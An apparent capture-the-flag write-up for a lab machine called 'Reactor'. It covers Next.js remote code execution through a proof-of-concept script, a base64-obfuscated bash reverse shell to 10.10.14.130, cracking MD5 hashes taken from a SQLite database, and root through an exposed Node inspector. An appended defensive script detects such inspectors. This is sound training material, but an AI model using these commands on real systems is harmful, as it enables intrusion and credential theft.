
Reactor

Author
Santiago Chavarro

Enumeration

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ce:fd:0d:82:c0:23:ed:6e:4b:ea:13:fa:4f:ea:ef:b7 (ECDSA)
|_  256 f8:44:c6:46:58:7a:39:21:ef:16:44:e9:58:c2:f3:62 (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
|     x-nextjs-cache: HIT
|     x-nextjs-prerender: 1
|     x-nextjs-stale-time: 4294967294
|     X-Powered-By: Next.js
|     Cache-Control: s-maxage=31536000, 
|     ETag: "p02u6gnhufd8t"
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 17175
|     Date: Sun, 24 May 2026 01:38:26 GMT
|     Connection: close
|     <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="/_next/static/css/414e1be982bc8557.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-db0a529a99835594.js"/><script src="/_next/static/chunks/4bd1b696-80bcaf75e1b4285e.js" async=""></script><script src="/_next/static/chunks/517-d083b552e04dead1.js" async=""></script><script s
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch
|     Allow: GET
|     Allow: HEAD
|     Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
|     Date: Sun, 24 May 2026 01:38:27 GMT
|     Connection: close
|   Help, NCP: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close

Port 3000

![[Pasted image 20260523213729.png]]

With Wappalyzer we can see that it is using Next.js 15.0.3 and Node, but we do not have the version.

Node version

To find the Node version I had to install the React Developer Tools extension; we reload the page and the developer tools show the version:

![[Pasted image 20260523213955.png]]

It is 19.0.0, which is perfectly vulnerable.

User

For this we will use a PoC, first to obtain command execution and then a shell.

$ python3 main.py http://10.129.1.209:3000

500
0:{"a":"$@1","f":"","b":"L3bimJe_3LvBcFWAnK5L4"}
1:E{"digest":"uid=999(node) gid=988(node) groups=988(node)"}

$ python3 penelope.py

$ python3 main.py http://10.129.3.178:3000 "printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTMwLzQ0NDQgMD4mMSkgJg==|base64 -d|bash"

node@reactor:/opt/reactor-app$ sqlite3 reactor.db
sqlite> select * from users;

1|admin|a203b22191d744a4e70ada5c101b17b8|administrator|admin@reactor.htb
2|engineer|39d97110eafe2a9a68639812cd271e8e|operator|engineer@reactor.htb

Now we can crack the engineer hash with john; in this case it is an MD5 hash:

$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5

reactor1         (?) # Password

$ ssh engineer@10.129.3.178

Root

engineer@reactor:~$ ps aux

root        1366  0.0  1.2 1067732 50196 ?       Ssl  14:38   0:01 /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js

We see that it is running as root and that, according to HackTricks, we can execute commands.

$ nc -lvnp 4444

engineer@reactor:~$ node inspect 127.0.0.1:9229

debug> repl
> process.mainModule.require('child_process').execSync('printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTMwLzQ0NDQgMD4mMSkgJg==|base64 -d|bash').toString()

$ whoami
root
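
An added example, not part of the original write-up: a defender-side check that parses `ps aux` output for Node.js processes started with an inspector flag, like the root-owned worker above. The sample lines other than the root one, the function names and the severity labels are assumptions made for illustration.

```javascript
// Added example (not from the original write-up): flag Node.js inspector listeners in `ps aux` output.
// SAMPLE_PS is constructed; only the root-owned line mirrors the process shown above.
const SAMPLE_PS = [
  'USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND',
  'root        1366  0.0  1.2 1067732 50196 ?       Ssl  14:38   0:01 /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js',
  'node        2210  0.1  2.0 1100000 81000 ?       Ssl  14:40   0:03 /usr/bin/node --inspect-brk=0.0.0.0:9230 server.js',
  'www-data    2301  0.0  0.9  900000 40000 ?       Ssl  14:41   0:00 node --inspect app.js',
  'node        2400  0.0  0.8  800000 30000 ?       Ssl  14:42   0:00 /usr/bin/node /opt/reactor-app/server.js',
].join('\n');

// --inspect, --inspect-brk and --inspect-wait all open the debugger; the value is an optional [host:]port.
const INSPECT_FLAG = /^--inspect(?:-brk|-wait)?(?:=(.*))?$/;

function parseListenAddress(value) {
  let host = '127.0.0.1', port = 9229;           // Node's defaults when no value is given
  if (!value) return { host, port };
  const idx = value.lastIndexOf(':');
  const tail = value.slice(idx + 1);
  if (/^\d+$/.test(tail)) {                       // "9230" or "host:9230"
    port = Number(tail);
    if (idx > 0) host = value.slice(0, idx);
  } else {
    host = value;                                 // bare host, e.g. "0.0.0.0" or "[::1]"
  }
  return { host, port };
}

function auditPs(psOutput) {
  const findings = [];
  for (const line of psOutput.split('\n')) {
    const cols = line.trim().split(/\s+/);
    if (cols.length < 11) continue;               // ps aux: 10 fixed columns, then the command
    const [user, pid] = cols;
    const argv = cols.slice(10);
    if (!/(^|\/)node(js)?$/.test(argv[0])) continue;
    for (const arg of argv.slice(1)) {            // may over-report flags placed after the script name
      const m = INSPECT_FLAG.exec(arg);
      if (!m) continue;
      const { host, port } = parseListenAddress(m[1]);
      const loopback = host === 'localhost' || host === '[::1]' || host.startsWith('127.');
      // The inspector has no authentication: on loopback, any local user can still attach.
      const severity = !loopback ? 'critical' : user === 'root' ? 'high' : 'medium';
      findings.push({ user, pid: Number(pid), host, port, loopback, severity });
    }
  }
  return findings;
}

console.log(JSON.stringify(auditPs(SAMPLE_PS), null, 2));
```

Flags set through the `NODE_OPTIONS` environment variable do not appear in `ps` output, so a complete audit also checks service unit files and process environments.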
